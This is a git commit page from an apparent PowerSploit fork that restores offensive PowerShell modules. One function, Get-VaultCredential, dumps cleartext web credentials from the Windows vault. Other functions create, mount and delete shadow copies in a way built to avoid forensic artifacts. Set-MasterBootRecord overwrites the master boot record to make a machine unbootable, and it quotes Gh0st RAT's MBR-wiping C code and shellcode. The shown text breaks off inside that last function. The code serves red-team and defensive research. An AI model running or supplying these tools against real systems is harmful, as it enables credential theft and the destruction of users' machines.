Gh0st
/
PowerSploit
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity

Revert "Normalizing all files to ascii encoding" 

This reverts commit 5a812ce823.
This commit is contained in:
Matt Graeber 2015-11-04 13:41:36 -05:00
parent 5a812ce823
commit 2dd1f5920d
7 changed files with 1726 additions and 65 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

63
.gitattributes vendored
View File

@ -1,63 +0,0 @@
###############################################################################
# Set default behavior to automatically normalize line endings.
###############################################################################
* text=auto
###############################################################################
# Set default behavior for command prompt diff.
#
# This is need for earlier builds of msysgit that does not have it on by
# default for csharp files.
# Note: This is only used by command line
###############################################################################
#*.cs diff=csharp
###############################################################################
# Set the merge driver for project and solution files
#
# Merging from the command prompt will add diff markers to the files if there
# are conflicts (Merging from VS is not affected by the settings below, in VS
# the diff markers are never inserted). Diff markers may cause the following
# file extensions to fail to load in VS. An alternative would be to treat
# these files as binary and thus will always conflict and require user
# intervention with every merge. To do so, just uncomment the entries below
###############################################################################
#*.sln merge=binary
#*.csproj merge=binary
#*.vbproj merge=binary
#*.vcxproj merge=binary
#*.vcproj merge=binary
#*.dbproj merge=binary
#*.fsproj merge=binary
#*.lsproj merge=binary
#*.wixproj merge=binary
#*.modelproj merge=binary
#*.sqlproj merge=binary
#*.wwaproj merge=binary
###############################################################################
# behavior for image files
#
# image files are treated as binary by default.
###############################################################################
#*.jpg binary
#*.png binary
#*.gif binary
###############################################################################
# diff behavior for common document formats
#
# Convert binary document formats to text before diffing them. This feature
# is only available from the command line. Turn it on by uncommenting the
# entries below.
###############################################################################
#*.doc diff=astextplain
#*.DOC diff=astextplain
#*.docx diff=astextplain
#*.DOCX diff=astextplain
#*.dot diff=astextplain
#*.DOT diff=astextplain
#*.pdf diff=astextplain
#*.PDF diff=astextplain
#*.rtf diff=astextplain
#*.RTF diff=astextplain

2
.gitignore vendored
View File

@ -212,5 +212,3 @@ pip-log.txt
#Mr Developer
.mr.developer.cfg
*.pssproj
*.sln

401
Exfiltration/Get-VaultCredential.ps1
View File

@ -0,0 +1,401 @@
function Get-VaultCredential
{
<#
.SYNOPSIS
Displays Windows vault credential objects including cleartext web credentials.
PowerSploit Function: Get-VaultCredential
Author: Matthew Graeber (@mattifestation)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
.DESCRIPTION
Get-VaultCredential enumerates and displays all credentials stored in the Windows
vault. Web credentials, specifically are displayed in cleartext. This script was
inspired by the following C implementation: http://www.oxid.it/downloads/vaultdump.txt
.EXAMPLE
Get-VaultCredential
.NOTES
Only web credentials can be displayed in cleartext.
#>
[CmdletBinding()] Param()
$OSVersion = [Environment]::OSVersion.Version
$OSMajor = $OSVersion.Major
$OSMinor = $OSVersion.Minor
#region P/Invoke declarations for vaultcli.dll
$DynAssembly = New-Object System.Reflection.AssemblyName('VaultUtil')
$AssemblyBuilder = [AppDomain]::CurrentDomain.DefineDynamicAssembly($DynAssembly, [Reflection.Emit.AssemblyBuilderAccess]::Run)
$ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('VaultUtil', $False)
$EnumBuilder = $ModuleBuilder.DefineEnum('VaultLib.VAULT_ELEMENT_TYPE', 'Public', [Int32])
$null = $EnumBuilder.DefineLiteral('Undefined', -1)
$null = $EnumBuilder.DefineLiteral('Boolean', 0)
$null = $EnumBuilder.DefineLiteral('Short', 1)
$null = $EnumBuilder.DefineLiteral('UnsignedShort', 2)
$null = $EnumBuilder.DefineLiteral('Int', 3)
$null = $EnumBuilder.DefineLiteral('UnsignedInt', 4)
$null = $EnumBuilder.DefineLiteral('Double', 5)
$null = $EnumBuilder.DefineLiteral('Guid', 6)
$null = $EnumBuilder.DefineLiteral('String', 7)
$null = $EnumBuilder.DefineLiteral('ByteArray', 8)
$null = $EnumBuilder.DefineLiteral('TimeStamp', 9)
$null = $EnumBuilder.DefineLiteral('ProtectedArray', 10)
$null = $EnumBuilder.DefineLiteral('Attribute', 11)
$null = $EnumBuilder.DefineLiteral('Sid', 12)
$null = $EnumBuilder.DefineLiteral('Last', 13)
$VAULT_ELEMENT_TYPE = $EnumBuilder.CreateType()
$EnumBuilder = $ModuleBuilder.DefineEnum('VaultLib.VAULT_SCHEMA_ELEMENT_ID', 'Public', [Int32])
$null = $EnumBuilder.DefineLiteral('Illegal', 0)
$null = $EnumBuilder.DefineLiteral('Resource', 1)
$null = $EnumBuilder.DefineLiteral('Identity', 2)
$null = $EnumBuilder.DefineLiteral('Authenticator', 3)
$null = $EnumBuilder.DefineLiteral('Tag', 4)
$null = $EnumBuilder.DefineLiteral('PackageSid', 5)
$null = $EnumBuilder.DefineLiteral('AppStart', 100)
$null = $EnumBuilder.DefineLiteral('AppEnd', 10000)
$VAULT_SCHEMA_ELEMENT_ID = $EnumBuilder.CreateType()
$LayoutConstructor = [Runtime.InteropServices.StructLayoutAttribute].GetConstructor([Runtime.InteropServices.LayoutKind])
$CharsetField = [Runtime.InteropServices.StructLayoutAttribute].GetField('CharSet')
$StructLayoutCustomAttribute = New-Object Reflection.Emit.CustomAttributeBuilder($LayoutConstructor,
@([Runtime.InteropServices.LayoutKind]::Explicit),
$CharsetField,
@([Runtime.InteropServices.CharSet]::Ansi))
$StructAttributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'
$TypeBuilder = $ModuleBuilder.DefineType('VaultLib.VAULT_ITEM', $StructAttributes, [Object], [System.Reflection.Emit.PackingSize]::Size4)
$null = $TypeBuilder.DefineField('SchemaId', [Guid], 'Public')
$null = $TypeBuilder.DefineField('pszCredentialFriendlyName', [IntPtr], 'Public')
$null = $TypeBuilder.DefineField('pResourceElement', [IntPtr], 'Public')
$null = $TypeBuilder.DefineField('pIdentityElement', [IntPtr], 'Public')
$null = $TypeBuilder.DefineField('pAuthenticatorElement', [IntPtr], 'Public')
if ($OSMajor -ge 6 -and $OSMinor -ge 2)
{
$null = $TypeBuilder.DefineField('pPackageSid', [IntPtr], 'Public')
}
$null = $TypeBuilder.DefineField('LastModified', [UInt64], 'Public')
$null = $TypeBuilder.DefineField('dwFlags', [UInt32], 'Public')
$null = $TypeBuilder.DefineField('dwPropertiesCount', [UInt32], 'Public')
$null = $TypeBuilder.DefineField('pPropertyElements', [IntPtr], 'Public')
$VAULT_ITEM = $TypeBuilder.CreateType()
$TypeBuilder = $ModuleBuilder.DefineType('VaultLib.VAULT_ITEM_ELEMENT', $StructAttributes)
$TypeBuilder.SetCustomAttribute($StructLayoutCustomAttribute)
$null = $TypeBuilder.DefineField('SchemaElementId', $VAULT_SCHEMA_ELEMENT_ID, 'Public').SetOffset(0)
$null = $TypeBuilder.DefineField('Type', $VAULT_ELEMENT_TYPE, 'Public').SetOffset(8)
$VAULT_ITEM_ELEMENT = $TypeBuilder.CreateType()
$TypeBuilder = $ModuleBuilder.DefineType('VaultLib.Vaultcli', 'Public, Class')
$PInvokeMethod = $TypeBuilder.DefinePInvokeMethod('VaultOpenVault',
'vaultcli.dll',
'Public, Static',
[Reflection.CallingConventions]::Standard,
[Int32],
[Type[]] @([Guid].MakeByRefType(),
[UInt32],
[IntPtr].MakeByRefType()),
[Runtime.InteropServices.CallingConvention]::Winapi,
[Runtime.InteropServices.CharSet]::Auto)
$PInvokeMethod = $TypeBuilder.DefinePInvokeMethod('VaultCloseVault',
'vaultcli.dll',
'Public, Static',
[Reflection.CallingConventions]::Standard,
[Int32],
[Type[]] @([IntPtr].MakeByRefType()),
[Runtime.InteropServices.CallingConvention]::Winapi,
[Runtime.InteropServices.CharSet]::Auto)
$PInvokeMethod = $TypeBuilder.DefinePInvokeMethod('VaultFree',
'vaultcli.dll',
'Public, Static',
[Reflection.CallingConventions]::Standard,
[Int32],
[Type[]] @([IntPtr]),
[Runtime.InteropServices.CallingConvention]::Winapi,
[Runtime.InteropServices.CharSet]::Auto)
$PInvokeMethod = $TypeBuilder.DefinePInvokeMethod('VaultEnumerateVaults',
'vaultcli.dll',
'Public, Static',
[Reflection.CallingConventions]::Standard,
[Int32],
[Type[]] @([Int32],
[Int32].MakeByRefType(),
[IntPtr].MakeByRefType()),
[Runtime.InteropServices.CallingConvention]::Winapi,
[Runtime.InteropServices.CharSet]::Auto)
$PInvokeMethod = $TypeBuilder.DefinePInvokeMethod('VaultEnumerateItems',
'vaultcli.dll',
'Public, Static',
[Reflection.CallingConventions]::Standard,
[Int32],
[Type[]] @([IntPtr],
[Int32],
[Int32].MakeByRefType(),
[IntPtr].MakeByRefType()),
[Runtime.InteropServices.CallingConvention]::Winapi,
[Runtime.InteropServices.CharSet]::Auto)
if ($OSMajor -ge 6 -and $OSMinor -ge 2)
{
$PInvokeMethod = $TypeBuilder.DefinePInvokeMethod('VaultGetItem',
'vaultcli.dll',
'Public, Static',
[Reflection.CallingConventions]::Standard,
[Int32],
[Type[]] @([IntPtr],
[Guid].MakeByRefType(),
[IntPtr],
[IntPtr],
[IntPtr],
[IntPtr],
[Int32],
[IntPtr].MakeByRefType()),
[Runtime.InteropServices.CallingConvention]::Winapi,
[Runtime.InteropServices.CharSet]::Auto)
}
else
{
$PInvokeMethod = $TypeBuilder.DefinePInvokeMethod('VaultGetItem',
'vaultcli.dll',
'Public, Static',
[Reflection.CallingConventions]::Standard,
[Int32],
[Type[]] @([IntPtr],
[Guid].MakeByRefType(),
[IntPtr],
[IntPtr],
[IntPtr],
[Int32],
[IntPtr].MakeByRefType()),
[Runtime.InteropServices.CallingConvention]::Winapi,
[Runtime.InteropServices.CharSet]::Auto)
}
$Vaultcli = $TypeBuilder.CreateType()
#endregion
# Helper function to extract the ItemValue field from a VAULT_ITEM_ELEMENT struct.
function local:Get-VaultElementValue
{
Param (
[ValidateScript({$_ -ne [IntPtr]::Zero})]
[IntPtr]
$VaultElementPtr
)
$PartialElement = [Runtime.InteropServices.Marshal]::PtrToStructure($VaultElementPtr, [Type] $VAULT_ITEM_ELEMENT)
$ElementPtr = [IntPtr] ($VaultElementPtr.ToInt64() + 16)
switch ($PartialElement.Type)
{
$VAULT_ELEMENT_TYPE::String {
$StringPtr = [Runtime.InteropServices.Marshal]::ReadIntPtr([IntPtr] $ElementPtr)
[Runtime.InteropServices.Marshal]::PtrToStringUni([IntPtr] $StringPtr)
}
$VAULT_ELEMENT_TYPE::Boolean {
[Bool] [Runtime.InteropServices.Marshal]::ReadByte([IntPtr] $ElementPtr)
}
$VAULT_ELEMENT_TYPE::Short {
[Runtime.InteropServices.Marshal]::ReadInt16([IntPtr] $ElementPtr)
}
$VAULT_ELEMENT_TYPE::UnsignedShort {
[Runtime.InteropServices.Marshal]::ReadInt16([IntPtr] $ElementPtr)
}
$VAULT_ELEMENT_TYPE::Int {
[Runtime.InteropServices.Marshal]::ReadInt32([IntPtr] $ElementPtr)
}
$VAULT_ELEMENT_TYPE::UnsignedInt {
[Runtime.InteropServices.Marshal]::ReadInt32([IntPtr] $ElementPtr)
}
$VAULT_ELEMENT_TYPE::Double {
[Runtime.InteropServices.Marshal]::PtrToStructure($ElementPtr, [Type] [Double])
}
$VAULT_ELEMENT_TYPE::Guid {
[Runtime.InteropServices.Marshal]::PtrToStructure($ElementPtr, [Type] [Guid])
}
$VAULT_ELEMENT_TYPE::Sid {
$SidPtr = [Runtime.InteropServices.Marshal]::ReadIntPtr([IntPtr] $ElementPtr)
Write-Verbose "0x$($SidPtr.ToString('X8'))"
$SidObject = [Security.Principal.SecurityIdentifier] ([IntPtr] $SidPtr)
$SidObject.Value
}
# These elements are currently unimplemented.
# I have yet to see these used in practice.
$VAULT_ELEMENT_TYPE::ByteArray { $null }
$VAULT_ELEMENT_TYPE::TimeStamp { $null }
$VAULT_ELEMENT_TYPE::ProtectedArray { $null }
$VAULT_ELEMENT_TYPE::Attribute { $null }
$VAULT_ELEMENT_TYPE::Last { $null }
}
}
$VaultCount = 0
$VaultGuidPtr = [IntPtr]::Zero
$Result = $Vaultcli::VaultEnumerateVaults(0, [Ref] $VaultCount, [Ref] $VaultGuidPtr)
if ($Result -ne 0)
{
throw "Unable to enumerate vaults. Error (0x$($Result.ToString('X8')))"
}
$GuidAddress = $VaultGuidPtr
$VaultSchema = @{
([Guid] '2F1A6504-0641-44CF-8BB5-3612D865F2E5') = 'Windows Secure Note'
([Guid] '3CCD5499-87A8-4B10-A215-608888DD3B55') = 'Windows Web Password Credential'
([Guid] '154E23D0-C644-4E6F-8CE6-5069272F999F') = 'Windows Credential Picker Protector'
([Guid] '4BF4C442-9B8A-41A0-B380-DD4A704DDB28') = 'Web Credentials'
([Guid] '77BC582B-F0A6-4E15-4E80-61736B6F3B29') = 'Windows Credentials'
([Guid] 'E69D7838-91B5-4FC9-89D5-230D4D4CC2BC') = 'Windows Domain Certificate Credential'
([Guid] '3E0E35BE-1B77-43E7-B873-AED901B6275B') = 'Windows Domain Password Credential'
([Guid] '3C886FF3-2669-4AA2-A8FB-3F6759A77548') = 'Windows Extended Credential'
([Guid] '00000000-0000-0000-0000-000000000000') = $null
}
if ($VaultCount)
{
foreach ($i in 1..$VaultCount)
{
$VaultGuid = [Runtime.InteropServices.Marshal]::PtrToStructure($GuidAddress, [Type] [Guid])
$GuidAddress = [IntPtr] ($GuidAddress.ToInt64() + [Runtime.InteropServices.Marshal]::SizeOf([Type] [Guid]))
$VaultHandle = [IntPtr]::Zero
Write-Verbose "Opening vault - $($VaultSchema[$VaultGuid]) ($($VaultGuid))"
$Result = $Vaultcli::VaultOpenVault([Ref] $VaultGuid, 0, [Ref] $VaultHandle)
if ($Result -ne 0)
{
Write-Error "Unable to open the following vault: $($VaultSchema[$VaultGuid]). Error (0x$($Result.ToString('X8')))"
continue
}
$VaultItemCount = 0
$VaultItemPtr = [IntPtr]::Zero
$Result = $Vaultcli::VaultEnumerateItems($VaultHandle, 512, [Ref] $VaultItemCount, [Ref] $VaultItemPtr)
if ($Result -ne 0)
{
$null = $Vaultcli::VaultCloseVault([Ref] $VaultHandle)
Write-Error "Unable to enumerate vault items from the following vault: $($VaultSchema[$VaultGuid]). Error (0x$($Result.ToString('X8')))"
continue
}
$StructAddress = $VaultItemPtr
if ($VaultItemCount)
{
foreach ($j in 1..$VaultItemCount)
{
$CurrentItem = [Runtime.InteropServices.Marshal]::PtrToStructure($StructAddress, [Type] $VAULT_ITEM)
$StructAddress = [IntPtr] ($StructAddress.ToInt64() + [Runtime.InteropServices.Marshal]::SizeOf([Type] $VAULT_ITEM))
$PasswordVaultItem = [IntPtr]::Zero
if ($OSMajor -ge 6 -and $OSMinor -ge 2)
{
$Result = $Vaultcli::VaultGetItem($VaultHandle,
[Ref] $CurrentItem.SchemaId,
$CurrentItem.pResourceElement,
$CurrentItem.pIdentityElement,
$CurrentItem.pPackageSid,
[IntPtr]::Zero,
0,
[Ref] $PasswordVaultItem)
}
else
{
$Result = $Vaultcli::VaultGetItem($VaultHandle,
[Ref] $CurrentItem.SchemaId,
$CurrentItem.pResourceElement,
$CurrentItem.pIdentityElement,
[IntPtr]::Zero,
0,
[Ref] $PasswordVaultItem)
}
$PasswordItem = $null
if ($Result -ne 0)
{
Write-Error "Error occured retrieving vault item. Error (0x$($Result.ToString('X8')))"
continue
}
else
{
$PasswordItem = [Runtime.InteropServices.Marshal]::PtrToStructure($PasswordVaultItem, [Type] $VAULT_ITEM)
}
if ($VaultSchema.ContainsKey($VaultGuid))
{
$VaultType = $VaultSchema[$VaultGuid]
}
else
{
$VaultType = $VaultGuid
}
if ($PasswordItem.pAuthenticatorElement -ne [IntPtr]::Zero)
{
$Credential = Get-VaultElementValue $PasswordItem.pAuthenticatorElement
}
else
{
$Credential = $null
}
$PackageSid = $null
if ($CurrentItem.pPackageSid -and ($CurrentItem.pPackageSid -ne [IntPtr]::Zero))
{
$PackageSid = Get-VaultElementValue $CurrentItem.pPackageSid
}
$Properties = @{
Vault = $VaultType
Resource = if ($CurrentItem.pResourceElement) { Get-VaultElementValue $CurrentItem.pResourceElement } else { $null }
Identity = if ($CurrentItem.pIdentityElement) { Get-VaultElementValue $CurrentItem.pIdentityElement } else { $null }
PackageSid = $PackageSid
Credential = $Credential
LastModified = [DateTime]::FromFileTimeUtc($CurrentItem.LastModified)
}
$VaultItem = New-Object PSObject -Property $Properties
$VaultItem.PSObject.TypeNames[0] = 'VAULTCLI.VAULTITEM'
$VaultItem
$null = $Vaultcli::VaultFree($PasswordVaultItem)
}
}
$null = $Vaultcli::VaultCloseVault([Ref] $VaultHandle)
}
}
}

292
Exfiltration/VolumeShadowCopyTools.ps1
View File

@ -0,0 +1,292 @@
function Get-VolumeShadowCopy
{
<#
.SYNOPSIS
Lists the device paths of all local volume shadow copies.
PowerSploit Function: Get-VolumeShadowCopy
Author: Matthew Graeber (@mattifestation)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
Version: 2.0.0
#>
$UserIdentity = ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent())
if (-not $UserIdentity.IsInRole([Security.Principal.WindowsBuiltInRole]'Administrator'))
{
Throw 'You must run Get-VolumeShadowCopy from an elevated command prompt.'
}
Get-WmiObject -Namespace root\cimv2 -Class Win32_ShadowCopy | ForEach-Object { $_.DeviceObject }
}
function New-VolumeShadowCopy
{
<#
.SYNOPSIS
Creates a new volume shadow copy.
PowerSploit Function: New-VolumeShadowCopy
Author: Jared Atkinson (@jaredcatkinson)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
Version: 2.0.0
.DESCRIPTION
New-VolumeShadowCopy creates a volume shadow copy for the specified volume.
.PARAMETER Volume
Volume used for the shadow copy. This volume is sometimes referred to as the original volume.
The Volume parameter can be specified as a volume drive letter, mount point, or volume globally unique identifier (GUID) name.
.PARAMETER Context
Context that the provider uses when creating the shadow. The default is "ClientAccessible".
.EXAMPLE
New-VolumeShadowCopy -Volume C:\
Description
-----------
Creates a new VolumeShadowCopy of the C drive
#>
Param(
[Parameter(Mandatory = $True)]
[ValidatePattern('^\w:\\')]
[String]
$Volume,
[Parameter(Mandatory = $False)]
[ValidateSet("ClientAccessible")]
[String]
$Context = "ClientAccessible"
)
$UserIdentity = ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent())
if (-not $UserIdentity.IsInRole([Security.Principal.WindowsBuiltInRole]'Administrator'))
{
Throw 'You must run Get-VolumeShadowCopy from an elevated command prompt.'
}
# Save VSS Service initial state
$running = (Get-Service -Name VSS).Status
$class = [WMICLASS]"root\cimv2:win32_shadowcopy"
$return = $class.create("$Volume", "$Context")
switch($return.returnvalue)
{
1 {Write-Error "Access denied."; break}
2 {Write-Error "Invalid argument."; break}
3 {Write-Error "Specified volume not found."; break}
4 {Write-Error "Specified volume not supported."; break}
5 {Write-Error "Unsupported shadow copy context."; break}
6 {Write-Error "Insufficient storage."; break}
7 {Write-Error "Volume is in use."; break}
8 {Write-Error "Maximum number of shadow copies reached."; break}
9 {Write-Error "Another shadow copy operation is already in progress."; break}
10 {Write-Error "Shadow copy provider vetoed the operation."; break}
11 {Write-Error "Shadow copy provider not registered."; break}
12 {Write-Error "Shadow copy provider failure."; break}
13 {Write-Error "Unknown error."; break}
default {break}
}
# If VSS Service was Stopped at the start, return VSS to "Stopped" state
if($running -eq "Stopped")
{
Stop-Service -Name VSS
}
}
function Remove-VolumeShadowCopy
{
<#
.SYNOPSIS
Deletes a volume shadow copy.
PowerSploit Function: Remove-VolumeShadowCopy
Author: Jared Atkinson (@jaredcatkinson)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
Version: 2.0.0
.DESCRIPTION
Remove-VolumeShadowCopy deletes a volume shadow copy from the system.
.PARAMETER InputObject
Specifies the Win32_ShadowCopy object to remove
.PARAMETER DevicePath
Specifies the volume shadow copy 'DeviceObject' path. This path can be retrieved with the Get-VolumeShadowCopy PowerSploit function or with the Win32_ShadowCopy object.
.EXAMPLE
Get-VolumeShadowCopy | Remove-VolumeShadowCopy
Description
-----------
Removes all volume shadow copy
.EXAMPLE
Remove-VolumeShadowCopy -DevicePath '\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy4'
Description
-----------
Removes the volume shadow copy at the 'DeviceObject' path \\?\GLOBALROOT\DeviceHarddiskVolumeShadowCopy4
#>
[CmdletBinding(SupportsShouldProcess = $True)]
Param(
[Parameter(Mandatory = $True, ValueFromPipeline = $True)]
[ValidatePattern('^\\\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy[0-9]{1,3}$')]
[String]
$DevicePath
)
PROCESS
{
if($PSCmdlet.ShouldProcess("The VolumeShadowCopy at DevicePath $DevicePath will be removed"))
{
(Get-WmiObject -Namespace root\cimv2 -Class Win32_ShadowCopy | Where-Object {$_.DeviceObject -eq $DevicePath}).Delete()
}
}
}
function Mount-VolumeShadowCopy
{
<#
.SYNOPSIS
Mounts a volume shadow copy.
PowerSploit Function: Mount-VolumeShadowCopy
Author: Matthew Graeber (@mattifestation)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
Version: 2.0.0
.DESCRIPTION
Mount-VolumeShadowCopy mounts a volume shadow copy volume by creating a symbolic link.
.PARAMETER Path
Specifies the path to which the symbolic link for the mounted volume shadow copy will be saved.
.PARAMETER DevicePath
Specifies the volume shadow copy 'DeviceObject' path. This path can be retrieved with the Get-VolumeShadowCopy PowerSploit function or with the Win32_ShadowCopy object.
.EXAMPLE
Get-VolumeShadowCopy | Mount-VolumeShadowCopy -Path C:\VSS
Description
-----------
Create a mount point in 'C:\VSS' for each volume shadow copy volume
.EXAMPLE
Mount-VolumeShadowCopy -Path C:\VSS -DevicePath '\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy4'
.EXAMPLE
Get-WmiObject Win32_ShadowCopy | % { $_.DeviceObject -Path C:\VSS -DevicePath $_ }
#>
Param (
[Parameter(Mandatory = $True)]
[ValidateNotNullOrEmpty()]
[String]
$Path,
[Parameter(Mandatory = $True, ValueFromPipeline = $True)]
[ValidatePattern('^\\\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy[0-9]{1,3}$')]
[String[]]
$DevicePath
)
BEGIN
{
$UserIdentity = ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent())
if (-not $UserIdentity.IsInRole([Security.Principal.WindowsBuiltInRole]'Administrator'))
{
Throw 'You must run Get-VolumeShadowCopy from an elevated command prompt.'
}
# Validate that the path exists before proceeding
Get-ChildItem $Path -ErrorAction Stop | Out-Null
$DynAssembly = New-Object System.Reflection.AssemblyName('VSSUtil')
$AssemblyBuilder = [AppDomain]::CurrentDomain.DefineDynamicAssembly($DynAssembly, [Reflection.Emit.AssemblyBuilderAccess]::Run)
$ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('VSSUtil', $False)
# Define [VSS.Kernel32]::CreateSymbolicLink method using reflection
# (i.e. none of the forensic artifacts left with using Add-Type)
$TypeBuilder = $ModuleBuilder.DefineType('VSS.Kernel32', 'Public, Class')
$PInvokeMethod = $TypeBuilder.DefinePInvokeMethod('CreateSymbolicLink',
'kernel32.dll',
([Reflection.MethodAttributes]::Public -bor [Reflection.MethodAttributes]::Static),
[Reflection.CallingConventions]::Standard,
[Bool],
[Type[]]@([String], [String], [UInt32]),
[Runtime.InteropServices.CallingConvention]::Winapi,
[Runtime.InteropServices.CharSet]::Auto)
$DllImportConstructor = [Runtime.InteropServices.DllImportAttribute].GetConstructor(@([String]))
$SetLastError = [Runtime.InteropServices.DllImportAttribute].GetField('SetLastError')
$SetLastErrorCustomAttribute = New-Object Reflection.Emit.CustomAttributeBuilder($DllImportConstructor,
@('kernel32.dll'),
[Reflection.FieldInfo[]]@($SetLastError),
@($true))
$PInvokeMethod.SetCustomAttribute($SetLastErrorCustomAttribute)
$Kernel32Type = $TypeBuilder.CreateType()
}
PROCESS
{
foreach ($Volume in $DevicePath)
{
$Volume -match '^\\\\\?\\GLOBALROOT\\Device\\(?<LinkName>HarddiskVolumeShadowCopy[0-9]{1,3})$' | Out-Null
$LinkPath = Join-Path $Path $Matches.LinkName
if (Test-Path $LinkPath)
{
Write-Warning "'$LinkPath' already exists."
continue
}
if (-not $Kernel32Type::CreateSymbolicLink($LinkPath, "$($Volume)\", 1))
{
Write-Error "Symbolic link creation failed for '$Volume'."
continue
}
Get-Item $LinkPath
}
}
END
{
}
}

87
Mayhem/Mayhem.psd1
View File

@ -0,0 +1,87 @@
@{
# Script module or binary module file associated with this manifest.
ModuleToProcess = 'Mayhem.psm1'
# Version number of this module.
ModuleVersion = '1.0.0.0'
# ID used to uniquely identify this module
GUID = 'e65b93ff-63ba-4c38-97f1-bc4fe5a6651c'
# Author of this module
Author = 'Matthew Graeber'
# Company or vendor of this module
CompanyName = ''
# Copyright statement for this module
Copyright = 'BSD 3-Clause'
# Description of the functionality provided by this module
Description = 'PowerSploit Mayhem Module'
# Minimum version of the Windows PowerShell engine required by this module
PowerShellVersion = '2.0'
# Name of the Windows PowerShell host required by this module
# PowerShellHostName = ''
# Minimum version of the Windows PowerShell host required by this module
# PowerShellHostVersion = ''
# Minimum version of the .NET Framework required by this module
# DotNetFrameworkVersion = ''
# Minimum version of the common language runtime (CLR) required by this module
# CLRVersion = ''
# Processor architecture (None, X86, Amd64) required by this module
# ProcessorArchitecture = ''
# Modules that must be imported into the global environment prior to importing this module
# RequiredModules = @()
# Assemblies that must be loaded prior to importing this module
# RequiredAssemblies = @()
# Script files (.ps1) that are run in the caller's environment prior to importing this module.
# ScriptsToProcess = ''
# Type files (.ps1xml) to be loaded when importing this module
# TypesToProcess = @()
# Format files (.ps1xml) to be loaded when importing this module
# FormatsToProcess = @()
# Modules to import as nested modules of the module specified in RootModule/ModuleToProcess
# NestedModules = @()
# Functions to export from this module
FunctionsToExport = '*'
# Cmdlets to export from this module
CmdletsToExport = '*'
# Variables to export from this module
VariablesToExport = ''
# Aliases to export from this module
AliasesToExport = ''
# List of all modules packaged with this module.
ModuleList = @(@{ModuleName = 'Mayhem'; ModuleVersion = '1.0.0.0'; GUID = 'e65b93ff-63ba-4c38-97f1-bc4fe5a6651c'})
# List of all files packaged with this module
FileList = 'Mayhem.psm1', 'Mayhem.psd1', 'Usage.md'
# Private data to pass to the module specified in RootModule/ModuleToProcess
# PrivateData = ''
# HelpInfo URI of this module
# HelpInfoURI = ''
# Default prefix for commands exported from this module. Override the default prefix using Import-Module -Prefix.
# DefaultCommandPrefix = ''
}

366
Mayhem/Mayhem.psm1
View File

@ -0,0 +1,366 @@
function Set-MasterBootRecord
{
<#
.SYNOPSIS
Proof of concept code that overwrites the master boot record with the
message of your choice.
PowerSploit Function: Set-MasterBootRecord
Author: Matthew Graeber (@mattifestation) and Chris Campbell (@obscuresec)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
.DESCRIPTION
Set-MasterBootRecord is proof of concept code designed to show that it is
possible with PowerShell to overwrite the MBR. This technique was taken
from a public malware sample. This script is inteded solely as proof of
concept code.
.PARAMETER BootMessage
Specifies the message that will be displayed upon making your computer a brick.
.PARAMETER RebootImmediately
Reboot the machine immediately upon overwriting the MBR.
.PARAMETER Force
Suppress the warning prompt.
.EXAMPLE
Set-MasterBootRecord -BootMessage 'This is what happens when you fail to defend your network. #CCDC'
.NOTES
Obviously, this will only work if you have a master boot record to
overwrite. This won't work if you have a GPT (GUID partition table)
#>
<#
This code was inspired by the Gh0st RAT source code seen here (acquired from: http://webcache.googleusercontent.com/search?q=cache:60uUuXfQF6oJ:read.pudn.com/downloads116/sourcecode/hack/trojan/494574/gh0st3.6_%25E6%25BA%2590%25E4%25BB%25A3%25E7%25A0%2581/gh0st/gh0st.cpp__.htm+&cd=3&hl=en&ct=clnk&gl=us):
// CGh0stApp message handlers
unsigned char scode[] =
"\xb8\x12\x00\xcd\x10\xbd\x18\x7c\xb9\x18\x00\xb8\x01\x13\xbb\x0c"
"\x00\xba\x1d\x0e\xcd\x10\xe2\xfe\x49\x20\x61\x6d\x20\x76\x69\x72"
"\x75\x73\x21\x20\x46\x75\x63\x6b\x20\x79\x6f\x75\x20\x3a\x2d\x29";
int CGh0stApp::KillMBR()
{
HANDLE hDevice;
DWORD dwBytesWritten, dwBytesReturned;
BYTE pMBR[512] = {0};
// 重新构造MBR
memcpy(pMBR, scode, sizeof(scode) - 1);
pMBR[510] = 0x55;
pMBR[511] = 0xAA;
hDevice = CreateFile
(
"\\\\.\\PHYSICALDRIVE0",
GENERIC_READ | GENERIC_WRITE,
FILE_SHARE_READ | FILE_SHARE_WRITE,
NULL,
OPEN_EXISTING,
0,
NULL
);
if (hDevice == INVALID_HANDLE_VALUE)
return -1;
DeviceIoControl
(
hDevice,
FSCTL_LOCK_VOLUME,
NULL,
0,
NULL,
0,
&dwBytesReturned,
NULL
);
// 写入病毒内容
WriteFile(hDevice, pMBR, sizeof(pMBR), &dwBytesWritten, NULL);
DeviceIoControl
(
hDevice,
FSCTL_UNLOCK_VOLUME,
NULL,
0,
NULL,
0,
&dwBytesReturned,
NULL
);
CloseHandle(hDevice);
ExitProcess(-1);
return 0;
}
#>
[CmdletBinding(SupportsShouldProcess = $True, ConfirmImpact = 'High')] Param (
[ValidateLength(1, 479)]
[String]
$BootMessage = 'Stop-Crying; Get-NewHardDrive',
[Switch]
$RebootImmediately,
[Switch]
$Force
)
if (!([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]'Administrator'))
{
throw 'This script must be executed from an elevated command prompt.'
}
if (!$Force)
{
if (!$psCmdlet.ShouldContinue('Do you want to continue?','Set-MasterBootRecord prevent your machine from booting.'))
{
return
}
}
#region define P/Invoke types dynamically
$DynAssembly = New-Object System.Reflection.AssemblyName('Win32')
